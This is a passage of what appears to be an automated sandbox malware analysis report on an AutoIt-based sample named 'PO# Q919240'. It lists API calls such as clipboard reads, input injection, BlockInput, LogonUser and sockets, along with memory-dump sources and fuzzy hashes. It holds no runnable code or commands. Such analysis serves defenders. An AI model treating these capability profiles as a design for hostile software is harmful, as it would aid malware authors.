                • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                • TerminateProcess.KERNEL32(00000000), ref: 00422004
                • Note: IsDebuggerPresent, SetUnhandledExceptionFilter(NULL), UnhandledExceptionFilter and TerminateProcess with exit code C0000409 (STATUS_STACK_BUFFER_OVERRUN) is the MSVC C runtime's /GS stack-cookie failure handler (__report_gsfailure / __raise_securityfailure), emitted by the compiler into any /GS-protected binary; on its own this function is a weak anti-debugging indicator.
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID: pqI
                • API String ID: 2579439406-2459173057
                • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                APIs
                • __wcsicoll.LIBCMT ref: 00433349
                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                • __wcsicoll.LIBCMT ref: 00433375
                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsicollmouse_event
                • String ID: DOWN
                • API String ID: 1033544147-711622031
                • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                APIs
                • GetKeyboardState.USER32(?), ref: 0044C3D2
                • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: KeyboardMessagePostState$InputSend
                • String ID:
                • API String ID: 3031425849-0
                • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                APIs
                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorLastinet_addrsocket
                • String ID:
                • API String ID: 4170576061-0
                APIs
                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                • IsWindowVisible.USER32 ref: 0047A368
                • IsWindowEnabled.USER32 ref: 0047A378
                • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                • IsIconic.USER32 ref: 0047A393
                • IsZoomed.USER32 ref: 0047A3A1
                Similarity
                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                • String ID:
                • API String ID: 292994002-0
                APIs
                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                • CoInitialize.OLE32(00000000), ref: 00478442
                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                • CoUninitialize.OLE32 ref: 0047863C
                Strings
                Similarity
                • API ID: CreateInitializeInstanceUninitialize_wcslen
                • String ID: .lnk
                • API String ID: 886957087-24824748
                APIs
                • OpenClipboard.USER32(?), ref: 0046DCE7
                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                • CloseClipboard.USER32 ref: 0046DD0D
                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                • CloseClipboard.USER32 ref: 0046DD41
                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                • CloseClipboard.USER32 ref: 0046DD99
                Similarity
                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                • String ID:
                • API String ID: 15083398-0
                APIs
                Strings
                Similarity
                • API ID: _memmove
                • String ID: U$\
                • API String ID: 4104443479-100911408
                APIs
                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                Similarity
                • API ID: Find$File$CloseFirstNext
                • String ID:
                • API String ID: 3541575487-0
                APIs
                • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                • FindClose.KERNEL32(00000000), ref: 004339EB
                Similarity
                • API ID: FileFind$AttributesCloseFirst
                • String ID:
                • API String ID: 48322524-0
                APIs
                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                Similarity
                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                • String ID:
                • API String ID: 901099227-0
                APIs
                • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                Similarity
                • API ID: Proc
                • String ID:
                • API String ID: 2346855178-0
                APIs
                • BlockInput.USER32(00000001), ref: 0045A38B
                Similarity
                • API ID: BlockInput
                • String ID:
                • API String ID: 3456056419-0
                APIs
                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                Similarity
                • API ID: LogonUser
                • String ID:
                • API String ID: 1244722697-0
                APIs
                • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                Similarity
                • API ID: NameUser
                • String ID:
                • API String ID: 2645101109-0
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                Strings
                Similarity
                • API ID:
                • String ID: N@
                • API String ID: 0-1509896676
                • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                APIs
                • DeleteObject.GDI32(?), ref: 0045953B
                • DeleteObject.GDI32(?), ref: 00459551
                • DestroyWindow.USER32(?), ref: 00459563
                • GetDesktopWindow.USER32 ref: 00459581
                • GetWindowRect.USER32(00000000), ref: 00459588
                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                • GetClientRect.USER32(00000000,?), ref: 004596F8
                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                • GlobalLock.KERNEL32(00000000), ref: 0045978F
                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                • CloseHandle.KERNEL32(00000000), ref: 004597AC
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                • GlobalFree.KERNEL32(00000000), ref: 004597E2
                • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                • ShowWindow.USER32(?,00000004), ref: 00459865
                • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                • GetStockObject.GDI32(00000011), ref: 004598CD
                • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                • DeleteDC.GDI32(00000000), ref: 004598F8
                • _wcslen.LIBCMT ref: 00459916
                • _wcscpy.LIBCMT ref: 0045993A
                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                • GetDC.USER32(00000000), ref: 004599FC
                • SelectObject.GDI32(00000000,?), ref: 00459A0C
                • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                • String ID: $AutoIt v3$DISPLAY$static
                • API String ID: 4040870279-2373415609
                APIs
                • GetSysColor.USER32(00000012), ref: 0044181E
                • SetTextColor.GDI32(?,?), ref: 00441826
                • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                • GetSysColor.USER32(0000000F), ref: 00441849
                • SetBkColor.GDI32(?,?), ref: 00441864
                • SelectObject.GDI32(?,?), ref: 00441874
                • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                • GetSysColor.USER32(00000010), ref: 004418B2
                • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                • FrameRect.USER32(?,?,00000000), ref: 004418CA
                • DeleteObject.GDI32(?), ref: 004418D5
                • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                • FillRect.USER32(?,?,?), ref: 00441970
                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                • String ID:
                • API String ID: 69173610-0
                APIs
                • DestroyWindow.USER32(?), ref: 004590F2
                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                • GetClientRect.USER32(00000000,?), ref: 0045924E
                • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                • GetStockObject.GDI32(00000011), ref: 004592AC
                • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                • DeleteDC.GDI32(00000000), ref: 004592D6
                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                • GetStockObject.GDI32(00000011), ref: 004593D3
                • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                • API String ID: 2910397461-517079104
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsnicmp
                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                • API String ID: 1038674560-3360698832
                APIs
                • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                • SetCursor.USER32(00000000), ref: 0043075B
                • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                • SetCursor.USER32(00000000), ref: 00430773
                • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                • SetCursor.USER32(00000000), ref: 0043078B
                • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                • SetCursor.USER32(00000000), ref: 004307A3
                • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                • SetCursor.USER32(00000000), ref: 004307BB
                • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                • SetCursor.USER32(00000000), ref: 004307D3
                • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                • SetCursor.USER32(00000000), ref: 004307EB
                • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                • SetCursor.USER32(00000000), ref: 00430803
                • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                • SetCursor.USER32(00000000), ref: 0043081B
                • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                • SetCursor.USER32(00000000), ref: 00430833
                • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                • SetCursor.USER32(00000000), ref: 0043084B
                • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                • SetCursor.USER32(00000000), ref: 00430863
                • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                • SetCursor.USER32(00000000), ref: 0043087B
                • SetCursor.USER32(00000000), ref: 00430887
                • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                • SetCursor.USER32(00000000), ref: 0043089F
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Cursor$Load
                • String ID:
                • API String ID: 1675784387-0
                APIs
                • GetSysColor.USER32(0000000E), ref: 00430913
                • SetTextColor.GDI32(?,00000000), ref: 0043091B
                • GetSysColor.USER32(00000012), ref: 00430933
                • SetTextColor.GDI32(?,?), ref: 0043093B
                • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                • GetSysColor.USER32(0000000F), ref: 00430959
                • CreateSolidBrush.GDI32(?), ref: 00430962
                • GetSysColor.USER32(00000011), ref: 00430979
                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                • SelectObject.GDI32(?,00000000), ref: 0043099C
                • SetBkColor.GDI32(?,?), ref: 004309A6
                • SelectObject.GDI32(?,?), ref: 004309B4
                • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                • DrawFocusRect.USER32(?,?), ref: 00430A91
                • GetSysColor.USER32(00000011), ref: 00430A9F
                • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                • SelectObject.GDI32(?,?), ref: 00430AD0
                • DeleteObject.GDI32(00000105), ref: 00430ADC
                • SelectObject.GDI32(?,?), ref: 00430AE3
                • DeleteObject.GDI32(?), ref: 00430AE9
                • SetTextColor.GDI32(?,?), ref: 00430AF0
                • SetBkColor.GDI32(?,?), ref: 00430AFB
                Memory Dump Source
